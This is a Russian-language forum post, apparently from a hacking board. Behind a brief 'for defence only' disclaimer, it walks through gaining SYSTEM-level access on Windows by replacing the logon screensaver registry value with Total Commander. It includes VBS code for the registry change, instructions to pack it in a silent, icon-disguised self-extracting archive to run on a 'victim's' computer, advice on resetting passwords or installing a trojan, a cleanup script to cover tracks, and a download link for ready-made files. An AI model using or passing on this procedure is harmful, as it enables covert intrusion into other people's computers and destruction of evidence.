| Статья только для того чтобы обороняться и устранять уязвимости. Мы не несём ответственность за ваши действия. Взлом осуществляется подменой заставки, которая запускается если выйти в экран приветствия (то есть выходом из всех пользователей), на Total commander, который будет иметь полные Админские права.........
Для этого нам понадобится 1 самораспаковывающийся файл, я его создал winrar.
Самораспаковывающийся архив содержит в себе TOTAL COMMANDER и vbs файл, который изменяет стандартную заставку на TOTAL COMMANDER”А. Этот exe сам выполняет то, что надо просто его надо запустить, не удивляетесь, если после запуска ничего не произойдёт, файл работает в фоне....
Вот что вам следует сделать:
1. Для взлома нужно скопировать все установленные файлы Total Commander'a
в %SYSTEMROOT%\SYSTEM32\ у многих это тут С:\WINDOWS\system32\. (То есть надо найти папку Windows, и в папке найти system32 туда и залить файлы)
Потом запускаем редактор реестра (regedit) заходим HKEY/USERS/DEFAULT/Control Panel/Desktop. В строковом параметре "SCRNSAVE.EXE" меняем значение scrnsave.scr на Totalcmd.exe.
У разных версий windows это значение неодинаковое.......... значение SCRNSAVE.EXE могут быть и scrnsave.scr и logon.scr...... по этому запомните начальное значение, так как придётся заметать следы..........
Там же находится еще один параметр "ScreenSaveTimeOut". Он отвечает за время через которое запустится скринсейвер, в нем ставим значение 100 (это примерно 2мин.) Иногда этого не достаточно чтобы все сработало на 100% тогда запускаем в реестре поиск и прописываем SCRNSAVE.EXE и ищем все параметры с таким названием, изменяя значения на выше указанные.
_____________________________________________________________________________
Каждый раз при взломе разбираться с этим нудное дело, можно создать один файл, который всё это выполнит....
Значит, создаём winrar SFX архив, там у нас будет Total commander и VBS файл.
Тело VBS
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.exe","Имя.Расширение" запускаемого файла, вместо заставки....В данном случае (по умолчанию Totalcmd.exe)"
Пишем куда извлекать в winrar %systemroot%\system32
Пишем туда где написано запуск программы после извлечения архива (в винраре) %sytemroot%\system32\имя_файла.расширение (vbs)
В winrar выбираем ничего не показывать, также можно выбрать иконку для маскировки.......
Если кому-то лень с этим. Возиться то вот готовый файл.
2. Запустить его на компьютере жертвы и подождать 30 секунд... 3. Сделать выход из пользователя... 4. Ждать максимум минут 5... 5. И всё... На компьютере запустится Total commander с полными правами Администратора! (так как его запускает SYSTEM) Теперь вы можете запустить и управление пользователями (Там можно поменять пароли), и запустить троян и установить игрушку итд итп, но не надо закрывать Total commanderво время работы!!!! ЛУЧШЕ СВЕРНУТЬ.......... Но надо ещё замести следы! Для этого нужно будет создать лекарство.....
Открываем Блокнот и пишем туда
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.exe","scrnsave.scr или logon.scr надо было запомнить" "
fso.deletefile "C:\windows\System32\Totalcmd.exe",1
сохраняем как vbs и запускаем
этот файл Заметает следы
Если кому то неохото ( или по просту лень) с этим разбираться вот эти два лекарства >>> http://depositfiles.com/files/d5j8jzspdl
I am a goth....Stalker-Goth.
Последний среди Последних 
| 
[cranky]
